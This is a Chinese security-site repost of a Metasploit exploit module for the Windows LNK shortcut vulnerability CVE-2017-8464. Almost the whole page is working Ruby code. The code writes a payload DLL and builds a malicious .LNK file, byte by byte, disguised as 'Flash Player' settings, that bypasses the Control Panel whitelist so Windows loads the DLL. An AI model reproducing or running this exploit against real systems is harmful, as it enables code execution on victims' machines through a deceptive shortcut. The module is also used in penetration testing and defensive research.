首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows LNK File Code Execution
来源:metasploit.com 作者:McIntyre 发布时间:2017-11-09  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Windows::Priv

  attr_accessor :exploit_dll_name

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'LNK Code Execution Vulnerability',
        'Description'     => %q{
          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
          that contain a dynamic icon, loaded from a malicious DLL.

          This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
          similar except an additional SpecialFolderDataBlock is included. The folder ID set
          in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
          the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
          DLL file.

          The PATH option must be an absolute path to a writeable directory which is indexed for
          searching. If no PATH is specified, the module defaults to %USERPROFILE%.
        },
        'Author'          =>
          [
            'Uncredited',      # vulnerability discovery
            'Yorick Koster',   # msf module
            'Spencer McIntyre' # msf module
          ],
        'License'         => MSF_LICENSE,
        'References'      =>
          [
            ['CVE', '2017-8464'],
            ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
            ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup
            ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format
            ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],
            ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']
          ],
        'DefaultOptions'  =>
          {
            'EXITFUNC'         => 'process',
            'FileDropperDelay' => 15,
            'WfsDelay'         => 30
          },
        'Arch'            => [ARCH_X86, ARCH_X64],
        'Payload'         =>
          {
            'Space'       => 2048
          },
        'Platform'        => 'win',
        'Targets'         =>
          [
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
            [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultTarget'   => 0, # Default target is Automatic
        'DisclosureDate'  => 'Jun 13 2017'
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [false, 'The LNK file']),
        OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
        OptString.new('PATH', [false, 'An explicit path to where the files should be written to'])
      ]
    )

    register_advanced_options(
      [
        OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
        OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
      ]
    )
  end

  def check
    if session.sys.process['SearchIndexer.exe']
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def get_name(option, default_ext)
    name = datastore[option].to_s.strip
    name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank?
    name
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if session.platform != 'windows'
      fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

    if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
    arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
    datastore['EXE::Path'] = path
    datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")

    path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%")
    path.chomp!("\\")

    dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}"
    write_file(dll_path, generate_payload_dll)

    lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}"
    write_file(lnk_path, generate_link(dll_path))
    register_files_for_cleanup(dll_path, lnk_path)
  end

  def file_rm(file)
    if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true)
      @dropped_files.delete(file)
    end
  end

  def generate_link(path)
    vprint_status("Generating LNK file to load: #{path}")
    path += "\x00" # Do not use << here
    display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
    comment = datastore['LnkComment'].dup << "\x00"

    # Control Panel Applet ItemID with our DLL
    cpl_applet = [
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00
    ].pack('C*')
    cpl_applet << [path.length].pack('v')
    cpl_applet << [display_name.length].pack('v')
    cpl_applet << path.unpack('C*').pack('v*')
    cpl_applet << display_name.unpack('C*').pack('v*')
    cpl_applet << comment.unpack('C*').pack('v*')

    # LinkHeader
    ret = [
      0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
      0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
      0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
      0x00, 0x00, 0x00, 0x00, # FileAttributes
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
      0x00, 0x00, 0x00, 0x00, # FileSize
      0x00, 0x00, 0x00, 0x00, # IconIndex
      0x00, 0x00, 0x00, 0x00, # ShowCommand
      0x00, 0x00, # HotKey
      0x00, 0x00, # Reserved1
      0x00, 0x00, 0x00, 0x00, # Reserved2
      0x00, 0x00, 0x00, 0x00  # Reserved3
    ].pack('C*')

    # IDList
    idlist_data = ''
    # ItemID = ItemIDSize (2 bytes) + Data (variable)
    idlist_data << [0x12 + 2].pack('v')
    idlist_data << [
      # All Control Panel Items
      0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
      0x30, 0x9d
    ].pack('C*')
    # ItemID = ItemIDSize (2 bytes) + Data (variable)
    idlist_data << [cpl_applet.length + 2].pack('v')
    idlist_data << cpl_applet
    idlist_data << [0x00].pack('v') # TerminalID

    # LinkTargetIDList
    ret << [idlist_data.length].pack('v') # IDListSize
    ret << idlist_data

    # ExtraData
    # SpecialFolderDataBlock
    ret << [
      0x10, 0x00, 0x00, 0x00, # BlockSize
      0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
      0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
      0x14, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
    ].pack('C*')
    # TerminalBlock
    ret << [0x00, 0x00, 0x00, 0x00].pack('V')
    ret
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·IBM Lotus Notes Denial Of Serv
·Mako Server 2.5 Command Inject
·FreeFloat FTP Server 1.0 HOST
·CoolPlayer+ Portable 2.19.6 St
·Linux Kernel 4.13 (Ubuntu 17.1
·SMPlayer 17.11.0 - '.m3u' Buff
·Debut Embedded httpd 1.20 - De
·Ipswitch WS_FTP Professional <
·Avaya IP Office (IPO) 10.1 Sof
·Avaya IP Office (IPO) 10.1 Act
·WordPress WP Mobile Detector 3
·tnftp - 'savefile' Arbitrary C
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved